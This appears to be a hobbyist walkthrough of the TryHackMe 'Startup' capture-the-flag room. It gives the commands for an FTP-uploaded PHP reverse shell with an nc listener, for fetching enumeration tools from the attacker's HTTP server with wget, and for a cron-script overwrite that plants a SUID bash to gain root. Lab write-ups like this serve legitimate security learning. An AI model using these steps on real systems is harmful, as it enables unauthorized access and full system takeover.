Startup v1.3 — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my Startup v1.3 — TryHackMe — WriteUp. Check it out!
First, deploy the machine and nmap for opened ports.
nmap -A -T5 -v <ip>
As FTP is opened and can be login as anonymous, let’s try to read content inside it.
Now i know a name: Maya. Maybe it will be useful for us to ssh or login to something. That’s all for FTP, I’ve moved around to find more but nothing valuable.
Let’s now access the website via port 80.
It’s always a good habit to check Page source:
Well the only thing we know is that this page needed to be update. Let’s use gobuster to check for hidden dirs.
gobuster dir -u http://<ip>/ -w /path-to-wordlist
Well there’s only “files” folder. Let’s access it.
It contains file under FTP. So which means that, if we upload a reverse shell to ftp, we can access it via this web and get our shell!
login to FTP again and cd to ftp
put php-reverse-shell.php
Success! Now go back to /files and get our shell.
Start a listener on your machine
nc -lvnp 1234
Then click the shell.php
Spawn a bash using python
python -c ‘import pty; pty.spawn(“/bin/bash”)’
Find our recipe:
find / -name *.txt 2>/dev/null
Now I know the 1st recipe, which is ❤
Let’s get the LinEnum.sh and transfer it to the ssh machine.
You can get it here:
https://github.com/rebootuser/LinEnum
Then start a http server on your machine:
python3 -m http.server 9000
Or if you use python2:
python2 -m SimpleHTTPServer 9000
Then from the ssh machine, cd to /tmp and:
wget http://<your-vpn-ip>:9000/LinEnum.sh
Then run LinEnum:
./LinEnum.sh -r report -e /tmp -t
After a while, you will see:
Well, let’s take a look at those folders.
There is a wireshark package here. Get it to our machine and inspect.
Again, start a listener on the ssh machine and wget from your machine.
The file has been transferred. Now use wireshark to find data inside. Follow the TCP Stream and:
Looks like there was an attacker who entered this machine before. We get a string: c4ntg3t3n0ughsp1c3
Maybe it’s a password for a user?
Get back to the target machine and look for possible login user:
cat /etc/passwd | grep /bin/bash
Well there’s only 2 users: root and vagrant. Let’s try to login as vagrant and root using the above string.
Well we cannot login as any user using that password. However, look back at the /home folder, you see a folder called “lennie”. Try to su to her
Success! Now get our 1st flag.
Now let’s own root to get our final flag. Download the pspy32 script, which can be used to snoop Linux process, and transfer it to the target machine. Again use python and wget.
You can download it here:
chmod +x pspy32
Then exec it.
You can see here, each minute it will run a script called planner.sh.
Look at the hint: ‘Scripts…’. There is a folder called “scripts”, so let’s access it.
Well there is a script called “planner” and a txt file. What the script does is that it will print the $LIST variable to the txt file, and then execute /etc/print.sh. Both files here belong to root, so we cannot modify. However, we can modify the script /etc/print.sh!
So, let’s modify the content of this script to get root.
cat > /etc/print.sh <<EOF
> #!/bin/bash
> echo “Done”
> cp /bin/bash /tmp/bash
> chmod 4755 /tmp/bash
> EOF
What am i doing here? I will copy the original /bin/bash to /tmp/bash, and set SUID bit on it. So it can be executed as root. Wait a min for the cronjob to run, and check /tmp:
ls -la /tmp/bash
NOTE:
If you get the error: text file busy, that means the “cat” command is still running and forbid the planner.sh to access /etc/print.sh. Run this cmd :
lsof | grep /etc/print.sh to get the id of “cat” process, and then run:
kill <id>
Now just exec that bash and I’m root!
/tmp/bash -p
*Remember the -p flag, because it will run bash with the current SUID. Without -p, you’re still lennie!
Now get our final flag.
The end.
HAPPY HACKING
